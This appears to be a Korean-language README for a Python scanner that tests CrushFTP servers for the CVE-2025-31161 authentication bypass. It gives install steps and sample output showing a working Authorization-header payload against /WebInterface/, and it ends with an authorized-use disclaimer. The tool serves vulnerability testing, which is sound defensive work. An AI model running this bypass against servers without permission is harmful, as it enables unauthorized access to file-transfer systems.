
대상이 CVE-2025-31161에 취약한지 스캔합니다.
CrushFTP 서버에서 CVE-2025-31161 취약점을 탐지하고 테스트하기 위한 Python 도구입니다.
이 스크립트는 HTTP Authorization 헤더 조작을 통해 원격 공격자가 유효한 자격 증명 없이 인증할 수 있는 CrushFTP 서버의 인증 우회 취약점(CVE-2025-31161)을 테스트합니다.
python3 CVE-2025-31161.py
git clone https://github.com/yourusername/CVE-2025-31161.py
cd CVE-2025-31161.py
pip3 install -r requirements.txt
$ python3 CVE-2025-31161.py
대상 IP 주소 입력: 192.168.1.100
대상 포트 입력 [8080]: 8080
==================================================
📡 테스트 중: /WebInterface/
🔑 페이로드: 'A'
📊 상태: 200
🎉 취약점 확인됨
💡 200 OK 및 콘텐츠: dashboard, main
✅ 작동하는 페이로드: 'A'
==================================================
🎯 대상: 192.168.1.100:8080
🔴 취약점 상태: 취약
💥 CVE-2025-31161 인증 우회 확인됨
✅ 작동하는 페이로드:
==================================================
이 도구는 교육 및 승인된 테스트 목적으로만 제공됩니다. 본인이 소유하거나 테스트할 명시적 권한이 있는 시스템에서만 사용하십시오.